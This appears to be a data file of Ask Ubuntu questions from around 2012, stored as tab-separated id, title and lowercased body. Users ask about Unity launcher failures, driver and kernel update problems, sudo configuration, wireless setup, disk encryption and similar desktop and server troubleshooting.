192008	recent update killed unity 3d launcher	i am scratching my head on this one , a lot of things are still new to me . i updated 126 packages just now through the update manager , and upon reboot everything works fine except the unity launcher . it 's just a dark space . the dash still works , as does the top panel and docky . when i try : unity -- replace i end up with this and then an indefinite hang : ( compiz:3689 ) : gconf-critical ** : gconf_client_add_dir : assertion `gconf_valid_key ( dirname , null ) ' failed warn 2012-09-23 02:18:29 unity.favorites favoritestoregsettings.cpp:139 unable to load gdesktopappinfo for 'ubiquity-gtkui.desktop' warn 2012-09-23 02:18:30 unity.favorites favoritestoregsettings.cpp:139 unable to load gdesktopappinfo for 'ubuntuone-installer.desktop' error 2012-09-23 02:18:30 unity.launcher.trashlaunchericon trashlaunchericon.cpp:62 could not create file monitor for trash uri : operation not supported initializing unityshell options ... done warn 2012-09-23 02:18:31 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-writer.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2012-09-23 02:18:31 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-calc.desktop ' is using a deprecated format for its actions that will be dropped soon . warn 2012-09-23 02:18:31 unity.libindicator < unknown > :0 desktop file '/usr/share/applications/libreoffice-impress.desktop ' is using a deprecated format for its actions that will be dropped soon . setting update `` main_menu_key '' setting update `` run_key '' unfortunately i can not make heads or tails of this . anyone , please help ?
192019	what can i use workspaces for , and how can they be used ?	i want to know why to use workspaces . i have seen many people using it but i do n't know why to use it . can anyone tell me why ?
192020	genisoimage and exec bit preservation	maybe i 'm just not doing right , but i ca n't seem to get genisoimage to produce a udf image and preserve the exec bit . $ genisoimage -- version genisoimage 1.1.11 ( linux ) $ echo `` echo 'hello world ' '' > script.sh $ chmod +x script.sh $ ./script.sh hello world $ genisoimage -input-charset utf-8 -r -udf -volid minimal -o minimal.iso script.sh total translation table size : 0 total rockridge attributes bytes : 250 total directory bytes : 0 path table size ( bytes ) : 10 max brk space used 0 420 extents written ( 0 mb ) $ mkdir mount $ sudo mount minimal.iso $ pwd/mount -o ro , loop -t udf $ ls -l script.sh mount/script.sh -r -- r -- r -- 1 root root 19 sep 21 18:40 mount/script.sh -rwxrwxr-x 1 kip kip 19 sep 21 18:40 script.sh you 'll note in the last command that script.sh was executable at the time it was injected into the image , but does not appear to be inside of the mounted image . is this a bug in genisoimage , a problem with the way i am mounting the image , or a problem in my usage of genisoimage ?
192021	upgrading gmp to 5.0.5	i tried building gmp 5.0.5 , and now when i 'm trying to build mpfr , it starts checking for gmp.h and libgmp . the mpfr gives me an error that gmp.h ( 5.0.5 ) and libgmp ( 5.0.2 ) do not match , and mpfr is giving me the above error during make when it reaches to the gmp stage . how can i fix this problem ? also , is there a way to check if gmp , mpfr or mpc are pre-existing on my machine , and their version numbers ?
192025	ubuntu 12.04 terminal only after nvidia driver upgrade	i recently installed ubuntu 12.04 ( after getting tired of windows ) . installation went fine . i had one problem when i got in suspend mode and then resumed my screen was scrambled . after some googling founds some tips to upgrade my nvidia drivers . i did this , and rebooted but only a terminal windows appears now instead of a graphical desktop . tried to fix it by several reboots , and removing xorg.conf , but still no luck . any advice how to fix it and get my desktop back ?
192033	after update the kernel ubuntu 12.04 wont boot	after i got the update manger ask me to update the kernel and after restar the only thing i got is a message with : file ca n't be found ... and now the only way to boot is to chose the previews linux in grub menu ! what should i do to fix this ?
192034	minecraft : right click shows cursor	i play java progammed game minecraft . when i place an block by using right click , it shows the cursor position over the java application as long i hold it down . it is annoying because on windows there was n't such problem . how to fix that ? thanks .
192036	clonning computer	i have a computer that installed ubuntu.and i am going to buy another one . i using my old computer with ubuntu for a year and i installed a lot of program . and i want to install same packages on my new computer . but i dont want install by one by . how i can clone programs from old computer to new one ? thanks for helps .
192037	bt voyager 1065 on lubuntu 12.04	i have just installed lubuntu 12.04 on an old inspiron 2650 . the installer did not boot with the pci wi-fi card nor does the installed system . they both boot fine without it . i have tried inserting after boot but lspci does not list it . please help in getting it to work . thanks in advance . p.s . i have to add vga=771 acpi=off to boot at all .
192041	no access to internet	i just installed ubuntu 12.04 yesterday but can not play song or videos . i do n't have access to internet . so what can be the possible solution ?
192045	disable cover page when printing from gimp	if i print from gimp ( version 2.6.11 ) i get always a cover page . if i print from other applications for example gimp , libreoffice , firefox or just from command line via lpr there is no cover page . is there a way to get rid of the cover page in gimp ? i use ubuntu natty 11.04 and cups version 1.4.6-5ubuntu1.4 .
192049	why did this command make my ubuntu more awesome than before ?	after running ubuntu for months and liking it , i for the first time wanted to use headphones and was trying to get them to work so i ran the code in step 1 https : //help.ubuntu.com/community/soundtroubleshootingprocedure -- the result was an improvement in performance , resolution , and audio.. a vast improvement . what does that suggest about what was wrong with my settings before if running this improved system performance , graphics , and my audio problem ? the command is : sudo add-apt-repository ppa : ubuntu-audio-dev/ppa ; sudo apt-get update ; sudo apt-get dist-upgrade ; sudo apt-get install linux-sound-base alsa-base alsa-utils gdm ubuntu-desktop linux-image-`uname -r` libasound2 ; sudo apt-get -y -- reinstall install linux-sound-base alsa-base alsa-utils gdm ubuntu-desktop linux-image-`uname -r` libasound2 ; killall pulseaudio ; rm -r ~/.pulse* ; sudo usermod -ag `cat /etc/group | grep -e '^pulse : ' -e '^audio : ' -e '^pulse-access : ' -e '^pulse-rt : ' -e '^video : ' | awk -f : ' { print $ 1 } ' | tr '\n ' ' , ' | sed 's : , $ : :g'` `whoami`
192050	how to run sudo command with no password ?	how does the ubuntu user on the aws images for ubuntu server 12.04 have passwordless sudo for all commands when there is no configuration for it in /etc/sudoers ? i 'm using ubuntu server 12.04 on amazon . i want to add a new user that has the same behavior as the default ubuntu user . specifically i want passwordless sudo for this new user . so i 've added a new user and went to edit /etc/sudoers ( using visudo of course ) . from reading that file it seemed like the default ubuntu user was getting it 's passwordless sudo from being a member of the admin group . so i added my new user to that . which did n't work . then i tried adding the nopasswd directive to sudoers . which also did n't work . anyway , now i 'm just curious . how does the ubuntu user get passwordless privileges if they are n't defined in /etc/sudoers . what is the mechanism that allows this ?
192053	is there a way to disable a particular pci port ?	i have a mb with 2 nics on it . a switch burned up and took out one of them . there is no way to turn them off individually in the bios . is there a way to turn off one of the ports ? can i unmap it , unbind it , power it down so the system does n't see it at after boot ? they are mapped as 0000:02.08.0 and 0000:02.08.1 . i want to turn the second one off somehow . since they both use the same driver , blacklisting the module will take out both of them . normally i would just live with it but it seems there should be a way to do that , like in windows i can just disable it . i actually have the exact same problem on another computer running xcp so this will be a two-fer if it gets figured out . the os is 12.4 lts server with xen on it .
192056	why do i get this error when opening a new tab in firefox ?	when i take a new tab in firefox , it 's showing this error . you have requested an encrypted page that contains some unencrypted information . information that you see or enter on this page could easily be read by a third party . why is it doing that ? how can i fix it ?
192057	dpkg upgrade error	when i 'm upgrading with sudo apt-get update & & sudo apt-get upgrade -y my terminal shows this : /var/cache/apt/archives/resolvconf_1.63ubuntu16_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) what does this mean ?
192058	what is technical difference between daemon , service and process ?	i want to know that what are differences in behavior of a daemon , process and service running in ubuntu desktop .
192064	12.04 freezes just after installation	12.04 freezes just after installation - a heading comes , mentioning the need for language support , and then the system freezes . any help or advice ?
192068	sources duplicate problems while updating	w : duplicate sources.list entry http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu/ precise/main i386 packages ( /var/lib/apt/lists/ppa.launchpad.net_gnome3-team_gnome3_ubuntu_dists_precise_main_binary-i386_packages ) w : you may want to run apt-get update to correct these problems i get this message while updating . i searched the apt list in /var but i do n't think there is any duplicates . the files of gnome3 team are only these : ppa.launchpad.net_gnome3-team_gnome3_ubuntu_dists_precise_main_binary-i386_packages ppa.launchpad.net_gnome3-team_gnome3_ubuntu_dists_precise_main_source_sources ppa.launchpad.net_gnome3-team_gnome3_ubuntu_dists_precise_release ppa.launchpad.net_gnome3-team_gnome3_ubuntu_dists_precise_release.gpg i do n't think there is any duplicates . can anyone point the problem out to me and tell me what to do ? forgive me but i am just a beginner and i do n't know all the terminal codes and responses yet . output of grep gnome3-team /etc/apt/sources.list /etc/apt/sources.list.d/* is /etc/apt/sources.list : # # # # gnome3 extra apps - https : //launchpad.net/~gnome3-team/+archive/gnome3 /etc/apt/sources.list : deb http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu precise main /etc/apt/sources.list : # # # # gnome3 extra apps ( source ) - https : //launchpad.net/~gnome3-team/+archive/gnome3 /etc/apt/sources.list : deb-src http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu precise main /etc/apt/sources.list.d/gnome3-team-gnome3-precise.list : deb http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu precise main /etc/apt/sources.list.d/gnome3-team-gnome3-precise.list : deb-src http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu precise main /etc/apt/sources.list.d/gnome3-team-gnome3-precise.list~ : deb http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu precise main /etc/apt/sources.list.d/gnome3-team-gnome3-precise.list~ : deb-src http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu precise main /etc/apt/sources.list.d/gnome3-team-gnome3-precise.list.save : deb http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu precise main /etc/apt/sources.list.d/gnome3-team-gnome3-precise.list.save : deb-src http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu precise main
192069	why does chromium show version 18 even after an update ?	i updated chromium in 12.04 with apt-get from the official repositories and chromium-browser -- version say chromium 20.0.1132.47 ubuntu 12.04. but `` about chromium '' from the browser itself say 18.0.1025.168 ( developer build 134367 linux ) ubuntu 12.04 why is that ? how can i update chromium ?
192071	dist-update kernel failed ?	i run : sudo apt-get update sudo apt-get dist-upgrade , and the linux kernel seemed to be updated to 3.2.0-31-generic successfully . however , after i rebooted , i typed : uname -a , it showed : linux albert-pc 3.2.0-29-generic # 46-ubuntu smp fri jul 27 17:03:23 utc 2012 x86_64 x86_64 x86_64 gnu/linux does that means the kernel was n't being updated ? i did n't encounter any error or warning messages during the upgrade or dist-upgrade . thanks for any help -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- modified -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- dear january : ii linux-image-3.2.0-23-generic 3.2.0-23.36 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-29-generic 3.2.0-29.46 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-30-generic 3.2.0-30.48 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-3.2.0-31-generic 3.2.0-31.50 linux kernel image for version 3.2.0 on 64 bit x86 smp ii linux-image-generic 3.2.0.31.34 generic linux kernel imageou could you please explain what this command and the subsequent result means ? thank you~
192073	problem installing virtualbox on ubuntu 9.04	i 'm using ubuntu 9.04 . from last few days i 'm trying to install a virtualbox , but i ca n't . i went to this link for virtualbox . https : //www.virtualbox.org/wiki/download_old_builds_3_0 found the virtualbox for my version . after downloading it in xp i restarted my pc and opened ubuntu . while installing by package installer there is a problem . but the status giving a massage everytime i 'm trying to install.it saying `` error : dependency is not satisfiable : libcurl3 ( > =7.16.2-1 ) '' . here is an icon named `` install package '' but its hidden . i do n't know what 's the problem.i 'm new to ubuntu , pls try to help me .
192077	wait ( ) weird behavior in ubuntu	i wrote the following program and executed in terminal . but i am confused that the program is n't displaying the results as wait behavior is described on internet . i copied this code from a book . # include < stdio.h > # include < stdlib.h > int main ( int argc , char *argv [ ] ) { pid_t childid ; if ( argc ! =2 ) { printf ( `` please an argument at terminal\n '' ) ; return 0 ; } int i , n = atoi ( argv [ 1 ] ) ; for ( i=0 ; i < n ; i++ ) { childid=fork ( ) ; if ( childid==0 ) { //sleep ( 20 ) ; break ; } } while ( wait ( null ) > 0 ) ; printf ( `` i= % d\n process id % d\n parent id % d\n child id % d\n '' , i , getpid ( ) , getppid ( ) , childid ) ; return 0 ; } should't the parent process execute the last `` printf '' statment n time , where n is the number of children created.. what happens when the parent calls while ( wait ( null ) > 0 ) ; and the child is still in excution ? thanks
192078	how to see the size and free disk space on the / filesystem 's partition ?	in nautilus , i can easily see the physical size ( total capacity , free space , used space ) of any mounted disk , e.g . those mounted under /media , by right-clicking on them where they are listed on the top of the left panel ( with a disk icon ) , or even by right-clicking on their folder icon on the right when i 'm seeing the contents of folder that contains them ( e.g . /media ) . but i ca n't do that with the partition that contains the root filesystem . how can i see the physical properties of the disk partition that is used as the / filesystem ? ? it is shown in the left panel of nautilus as `` file system '' with an icon similar ( but not identical ) to that of mounted filesystems , but if i right-click on it it will only show ( after the time it takes to compute it ) the total size of its contents including other mounted filesystems , and it wo n't show neither the total capacity nor the free space .
192081	how to run unity 2d launcher on top of gnome-shell on startup ?	i 've wrote this command line : `` if [ `` $ desktop_session '' == `` gnome-shell '' ] ; then ( unity-2d-shell ) ; fi '' . if i type it into a terminal then the 2d unity launcher would start and would work like a charm on top of the gnome-shell , however , if i add the line to the startup applications , it would have no effect . is there something wrong with the command line ? or is it just impossible to run the launcher on startup ?
192083	icons do n't display for some application launchers	i am running ubuntu 12.04 on my laptop for some time now . since the first day only i have been facing the problem with icon images of some application not appearing up . it causes a lot of inconvenience in locating/identifying an application to be launched . i have updated my ubuntu with the latest build today only but still the problem persists . i have googled around and tried everything relevant available out there but with no success . please note that reinstalling ubuntu is not an option right now .
192087	encrypt folders out of home	is there a way to encrypt a folder , which is not in /home but even in a different partition , so only my user can access/read contained files ? alternatively , i would like to understand if it is possible to turn a complete ext4 partition into an encrypted volume , which would be mounted at user login . if possible , i would like to make the change without reinstalling ubuntu . my pc has ( mount output ) : /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) /dev/sda3 on /home type ext4 ( rw ) /dev/sda4 on /home/igor/personale type ext4 ( rw ) sda4 is the partition containing folders i would like to protect . thanks !
192095	disabling auto/dwell click does n't work in ubuntu 12.04	i have unchecked all the dwell click options in gconf ( configuration editor ) but still auto click is enabled , teasing me . in ubuntu 12.04 , mouse setting option under 'all settings ' does n't provide any option to cause auto click disabled . how to get out of here ?
192096	which software should i use on ubuntu to create a windows xp liveusb ?	since many programs that i need only work on xp , i need to install windows xp on my 2 laptops but i ca n't use an optical drive , which makes using a usb the only option . if it helps , i can tell you that i used to have vista and windows 7 on my 2 laptops but i clean installed ubuntu 12.04 on one , and lubuntu on the other . also i have no trace of windows left on any of my laptops , when i bought my laptops they came without a windows cd , so i only had a 20gb partition on my hard drives ( which i formatted when i clean installed ubuntu and lubuntu . ) also , i have no problem with clean installing windows xp and the reinstalling ubuntu/lubuntu so i can dual boot . thanks ! edit : i have a iso file ready , on a usb .
192098	highlighting with grep does n't work in xterm	i 've got a problem with xterm . when i use the command tail -f example.log | grep -a -i -e 'examplestring' in xterm the `` grepped '' strings are n't highlighted in red like they would be in the normal terminal . how can i fix this ? google did n't help me very much .
192112	running python portably from usb drive	i want to download the python on my ubuntu 12.04 , but i run it on usb flash drive . do i have any choice to let the python download on my flash drive ? fyi it is my first time touching ubuntu so try to make it simple .
192116	how to install a higher version of wine ?	the default version of wine in ubuntu 12.04 is 1.4 . i would like to install the latest version of wine . i wonder how to do that ? thanks !
192126	when multitasking a fullscreen app , cant get mouse to lock back in the application : ex . spaz game	when i am running a fullscreen application , for example the game spaz from the humblebundle 6 , if some popup comes or if i press the super key to come back to desktop and minimize the game , i am unable to play the game again . the game just wont lock my mouse again , i am sometimes able to get it to become fullscreen again ( no idea exactly how ! ) , but the mouse just wont get locked.. any idea how to continue the game without exit and restart ?
192128	does 6 month ubuntu one promotion automatically renew ?	i bought a song from ubuntu one music store to benefit from the 6 months free promotion . will this automatically renew after the 6 months ? darryl
192130	how to change color and width of non overlay scrollbars in ubuntu 12.04	i know many people have complained about the almost invisible and not usable scrollbars in recent versions of ubuntu , even after removing or disabling the default overlay scrollbars . i wonder how can i easily change their color and width . i have a 13.3 inches monitor with a 1600*900 resolution and i can barely see them , as you can see in these images : i already changed firefox , libreoffice and some other software 's scrollbars using gnome color chooser : by the way , i 'm using unity . thanks !
192131	is it safe to install ubuntu with an virtual drive ? ( with daemon or alcohol )	is it safe to install ubuntu with an virtual diskdrive ( with daemon , alcohol , or magiciso ) ? because i 'm not sure , and wo n't take the risk .
192134	`` iscan '' only runs as root	i 've upgraded to ubuntu 12.04 , and i now want to run `` iscan '' ( i 've updated the packages like i did before ) . when i run iscan as a regular user , it says : '' could not send command to scanner '' . but when i run `` sudo iscan '' , everything is ok , the window of iscan is opened . how can i fix this to run iscan without being root ? thank you , ps : i 'm in the `` scanner '' group
192140	ubuntu 12.04 installation stuck on 'where do you live ' using cd	i am trying to install my first linux software , ubuntu 12.04 . i got an iso image of ubuntu 12.04 from a pc magazine dvd . i first burned it using imgburn on a clean new cd-rw . then i deleted a 40 gb partition to make it free . i booted from the cd , ubuntu came up , i selected the install option , followed by the install along windows 7 option . the installer did not ask me to slide partitions . it said copying files and then showed me a screen where i can select my area of residence . i selected this area and pressed the continue button . after which the mouse icon keeps on spinning busy . it keeps spinning even after the copying files is completed and the same world map is displayed . i can move , do all other things on the ubuntu , like going to settings menu and so on , but this installation window does n't seem to progress at all . there is no need to wait to get the keyboard layout option more than 5 minutes , right ? but i waited for about 1 hour . no progress . so i selected shutdown and restarted without cd . i went to windows 7 and saw that my 40 gb partition had been divided into two parts . i repeated the above process . ubuntu detected its previous installation attempt and asked to reinstall as the first option . again the same result . then i even switched to dvd-rw , again the same results . what is the problem , and how can i fix it ? could it be the iso file itself ? for further detail : i 'm using a corsair 4 gb ddr3 ram . so i guess that this doesnt have any role in this problem . the 40gb drive is actually a 160 gb hdd , split into 4 40gb partitions . the partition that i used had a windows 8 developer version installed in the past . i didnt need it , so i just right clicked and made a quick format and it got cleaned . then i went to the disk management in windows 7 and right-clicked on the partion and selected delete option and then it became an unused free memory of 40 gb capacity . during ubuntu installation , i selected the first option to install alongside windows 7 . then it took me straight to copying files and i got stuck `` in the where are you '' window . after shutting down and getting back to windows 7 , in the disk management i saw that the windows 7 was left untouched and i had two unnamed drives of basic type whose total capacity was 40 gb . this what i did . is it ok ? general info : i am using a desktop pc . processor : amd athlon x2 260 motherboard : asus m4a88tm hdd : 1 160 gb ide and another 40 gb ide . i used one of the 40 gb partitions on the 160 gb drive and not on the 40 gb hdd itself
192144	all the applications take long to start - how to speed up ?	i am using ubuntu 12.04 . i am experiencing a severe delay ( about 20 to 30 secs , sometime about a minute ) in applications getting started after clicking on it . for example , opening home holder ( nautilus ) opening firefox , chrome opening a media file with vlc opening a simple text file with gedit/geany there has been no installation of any third party software in past one month , just the normal update manager has run . do n't know why the response time of applications to start has been effected . is there any way i could speed up this on my machine ? please let me know if there are any tweaks i could do .
192145	livecd hangs when removing boot cd for burning another	i downloaded an image of 12.04 and i want to burn it onto a cd . apparently each time i boot to the 10.10 livecd and try to burn the image using the default application ( brasero disc burner ) , when i replace the livecd with the empty cd , the system freezes . what do i need to do so the system does n't freeze and lets me burn my image ?
192147	what new feature we can expect from ubuntu 12.04.02 ?	what new feature we may expect from ubuntu 12.04.02
192149	how to debug ubuntu 's booting errors ?	i downloaded ubuntu 12.10 beta1 iso and have been trying to boot from it using a usb stick . but every time i try to boot it freezes and all i can see is the ubuntu logo , which gives no idea about the cause of the freeze . i want to know if there is way such that instead of showing the ubuntu logo , the installer would show me console output , so i could know what the actual problem is . i know its still a beta software , but i do n't want my 750 mbs to go waste .
192155	internet issues after upgrading to ubuntu 12.10 beta	i upgraded to ubuntu 12.10 using update manager . after the upgrade , the internet connection would not display any webpages but if i ping 8.8.8.8 or google.com , there is response . i managed to fix this problem by using the command sudo dhclient eth1 but , now the problem is that every time i switch wireless networks , i have to give that command . how do i make this permanent ?
192160	elevate user-permissions in unity so i can move folders	i 'm switching from windows 7 so please excuse my newbie question . is it possible to elevate privileges of local user so it can access entire file system from unity ui ( even if it 's very very bad thing to do : ) ? for example i downloaded intellij idea tar . i unpacked it to ~/temp_idea and want to move it to /opt . but i ca n't . as soon as i try moving it in the ui i get `` permission denied '' error . i can do it in terminal via sudo mv of course but it would be very nice to be able to do it in the ui .
192162	wireless not working , tried to install drivers , did'nt work . what do i do ?	okay , here is the output of lspci . 00:00.0 host bridge : silicon integrated systems [ sis ] 760/m760 host ( rev 03 ) 00:01.0 pci bridge : silicon integrated systems [ sis ] sg86c202 00:02.0 isa bridge : silicon integrated systems [ sis ] sis963 [ mutiol media io ] lpc controller ( rev 25 ) 00:02.1 smbus : silicon integrated systems [ sis ] sis961/2/3 smbus controller 00:02.5 ide interface : silicon integrated systems [ sis ] 5513 ide controller 00:02.6 modem : silicon integrated systems [ sis ] ac'97 modem controller ( rev a0 ) 00:02.7 multimedia audio controller : silicon integrated systems [ sis ] sis7012 ac'97 sound controller ( rev a0 ) 00:03.0 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.1 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.3 usb controller : silicon integrated systems [ sis ] usb 2.0 controller 00:04.0 ethernet controller : silicon integrated systems [ sis ] sis900 pci fast ethernet ( rev 91 ) 00:0a.0 cardbus bridge : ene technology inc cb1410 cardbus controller ( rev 01 ) 00:0b.0 network controller : broadcom corporation bcm4306 802.11b/g wireless lan controller ( rev 03 ) 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:00.0 vga compatible controller : silicon integrated systems [ sis ] 661/741/760 pci/agp or 662/761gx pcie vga display adapter
192163	netflix streaming	is there anything being worked on so we can use netflix streaming service . it is kinda of a big deal to those of us who have a netflix acct . and i do n't mean some type of emulations software that never works anyway.. moonlight does n't work with ubuntu 12.04 . at least i havent gotten it to work yet .
192166	can not run .exe files	i have ubuntu version 12.10 , when i tried ( after the installation ) to run for example wow.exe , it went good . i did n't play it for about two weeks and then suddenly it does n't open . when i try to run it in terminal , it says this : i 've already found out that i need the `` scsiport.sys '' which is needed by `` prosync1 '' so i downloaded it and put into the same file as `` prosync1 '' but it 's still not working , i do n't know what else to do , could you help me please ?
192167	how large is the storage space of ubuntu 1 free ? ( how many gb do i have ) ?	i know that google 's my friend , but i did n't find the answer to this simple question anywhere . can somebody please help ?
192169	i am getting an error while writing my first app as shown in developer get-started tutorial	i am trying to learn to develop apps in ubuntu and currently i am going through this tutorial . as shown in the video i am writing the below given codes : self.refreshbutton = self.builder.get_object ( `` refreshbutton '' ) def on_refreshbutton_clicked ( self , widget ) : print `` refresh '' as soon as i try to run my application it is giving me an error : i type this command to run my application : quickly run ( trickybrowser:4418 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1971:11 : not using units is deprecated . assuming 'px ' . ( trickybrowser:4418 ) : gtk-warning ** : failed to parse /usr/share/themes/mac-os-lion-theme-v2/gtk-3.0/settings.ini : key file contains line '/* ' which is not a key-value pair , group , or comment traceback ( most recent call last ) : file `` bin/trickybrowser '' , line 32 , in < module > import trickybrowser file `` /home/tricky/trickybrowser/trickybrowser/__init__.py '' , line 14 , in < module > from trickybrowser import trickybrowserwindow file `` /home/tricky/trickybrowser/trickybrowser/trickybrowserwindow.py '' , line 32 print `` refresh '' ^ indentationerror : expected an indented block
192176	minimal gnome classic on a mini.iso ubuntu 12.04	i installed ubuntu 12.04 from the mini.iso i want the most minimal classic gnome possible , all i ever need is a terminal , wireless connection , chromium and mid-night commander . no video or audio players no office no nautilus and no other applications . how can this be achieved ? i also do n't want a log in graphical interface like gdm or lightdm , i 'll be happy to log in using the command line . thanks in advance
192178	i want to uninstall ubuntu 12.04 from a dual boot with windows 8 consumer preview ?	last time i did this i was on windows 7 so i just repaired the mbr with easybcd but when i try there is no option for windows 8 , only windows 7 . so my question is how do i repair the mbr without the installation cd .
192179	avi files dont play in vlc from iso mounted disk	i noticed this problem many times and i would like to know if there is any solution . so when i mount iso files and try to watch some avi files i got vlc errors . if i copy and paste the same files from the mounted iso files to any folder of my pc then vlc plays them great ! is n't it strange ? any solution for that ?
192181	cisco anyconnect flashes then disappears	i have installed the cisco anyconnect secure mobility client on my ubuntu 12.05 laptop using the vpnsetup.sh . it always works immediately after running the script but once i power-down then come back later it will just flash on the screen then go away . if i re-run the vpnsetup.sh it will work fine . this never happened until a couple of weeks ago i chose to accept all updates and did a mass update on my laptop . this has been occurring ever since . i 'm pretty new to linux and need some help troubleshooting . i really want to learn the system better and could use some guidance in troubleshooting issues like this in the future so i do n't have to keep bothering the experts . thanks .
192185	12.04 dell 14z inspiron 5423 ultrabook sound ( noise )	i 've just installed 12.04 on my new inspiron 14z and since the systems starts loading a white noise begin to sound . when i play any song or music from internet , it works fine , but the noise continues . i 've tried turning off all the volume controls but it continues..could any one help me or give me a clue to find a solution ? thanks
192186	how can i limit the gui choices in the drop-down menu at login ?	having installed gnome-shell , cinnamon , and glx/cairo-dock , the drop-down gui list at login is now quite long ( 3 gnome options , 3 glx options , 2 unity , and 2 cinnamon ) . i only plan on using a few of these options , and it would be great to remove the other clutter from the menu . so far , i have not found a way to do this . is it possible ?
192198	ubuntu 12.04 ca n't use mouse and internet	i 've been using ubuntu 12.04 for a while on my acer aspire one-722 . it was ok , but then , after some updates , the next time i started it , an window `` the system is running in low-graphics mode '' appeared . i could n't find out , what to do , so i reinstalled ubuntu from dvd . the installation went normally , but when i rebooted , i saw it does n't react on mouse moving , only to keyboard . it also does n't connect to wi-fi ( or i just do n't know , how to connect to it without mouse ) . i tried to find an answer in the internet , but most of advises include downloading something , which i ca n't do . thanks everyone who would try to help me . graphics : amd radeon hd 6250 graphics network : atheros ar8152/8158 pci-e fast ethernet controller ( ndis 6.20 ) processor : amd c-50
192203	how to use /dev/ ( u ) random	how can i use /dev/ ( u ) random on ubuntu or any *nix sistems ? i searched at google but i ca n't find how to : ( i tried this but it says permission denied . note : i also tried as root . /dev/ ( u ) random sudo /dev/ ( u ) random sudo -s ; /dev/ ( u ) random
192205	how do i install gcc 4.7.1 on 12.04 ?	it so happens that i hit a bug in ubuntu 's gcc 4.7.0 , which has been fixed in later versions of gcc ; i believe it 's already fixed in 4.7.1 . i can always download the source , compile and install it , but would n't it conflict with ubuntu 's package management ? there 's a `` toolchain test builds '' ppa , but it seems to only contain 4.7.0 for ubuntu 12.04 . what should i do to install gcc without disrupting my system ?
192211	missing dolphin context menu icons in ubuntu 12.04	i have installed dolphin and krusader to navigate faster than nautilus . ( i am happy with them , please do not advice another one ) but , when i right click , i see a context menu with no icons . in normal kubuntu os ( not ubuntu ) , there are icons in right click menu . could you help me how i could add this icons to context menu ?
192221	ubuntu server 12.04 ca n't connect home wireless network	i have installed ubuntu 12.04 ( server ) without gui . i have netgear wireless card ( model : wg311v3 ) that i have installed it through ndiswrapper driver wrapper to work with windows driver . i do n't have dchp installed ( i want to have static ip so i can use router 's port forwarding ) . i do n't have network-manager installed . i have googled a lot and have n't manage to connect to my home wireless network ( with encryption wpa/wpa2 psk ) . i am very confused of all the different approaches . i am not experienced linux user working with terminal ( no gui installed ) but i know the basics so as to understand what you are writing . can anyone explain me the steps to connect to my wireless router and gain access to the internet ? how do i set the ip addresses and everything ? just a simple guide . how do i set it up so as to work with wpa encryption ? i have tried a lot before posting this question but i have n't manage it to work and now i am very confused and need to start from the beginning . thank you
192225	apply transparency only to some windows with fluxbox	i 'm new to fluxbox , i 've adopted it this week end . ( i only knew kde , gnome , and unity lately ) . is there a possibility to apply transparency only to windows that match a criteria ? for example a regular expression or an exact matching against an application name . in deed , i do want the transparency in the terminals ... in the task manager ... but i do n't want it on other application . ( chromium for instance ) . could i set up something like this ?
192228	'ip rule flush ' breaks all connectivity	i 'm configuring some network stuff , and every time i try something the connection breaks . thinking that i must be configuring something incorrectly to break all connections , i did a bit of troubleshooting , to find out that on a fresh boot all networks are working . if i run the command ip rule flush i lose all connectivity until i reboot . i 'm using kubuntu 12.04 network manager connecting via wireless adapter . any help appreciated
192229	is it risky to install kde on ubuntu alongside unity and gnome ?	the last time i installed kde and gnome on the same os ( opensuse 12.1 ) , gdm and kdm started conflicting and they both stopped working properly and i was plagued with applications from both environments till the point the applications overview in gnome was flooded with useless kde trash . moreover , i still had parts of the kde desktop appearing when i 'm running gnome ( such as the password manager and kde fonts and some apps refused to give up the oxygen theme ) . if i install the plasma-desktop package on ubuntu , am i at risk of having such issues ? i just want kde with the bare minimum number of applications ; just the necessary ones to make things work . i 'd rather not have dolphin installed either . also , is it all right to install the kde-standard pack ? or should i just stick to the plasma-desktop pack ?
192231	ext4 ideal size ?	i have 1tb hdd and i will use ubuntu and wo n't use dual boot with windows , any tips about partitions ' size and how many partitions , can i have just 2 partitions ? the second question is about swap partition , do i have to make a separate partition for swap specially when i can use a file as a swap , is there any performance gain ?
192232	ubuntu server on vm , outgoing network working , but incoming is not	i have recently installed ubuntu server with lamp , openssh and mail on oracle 's vm , it 's incoming networking was working , apache 's default message could be seen when opening 127.0.0.1:8080 . but now it 's not ! : ( could you give me any tips ? i did n't find in google anything that helped me . : ( i 'm running windows 7 with such settings i recently used apt-get -- purge remove phpmyadmin . could that be the problem ? how should i fix it ? the output of ifconfig | grep inet from my server is : inet addr:10.0.2.15 bcast:10.0.2.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fef3:41dc/64 scope : link inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host
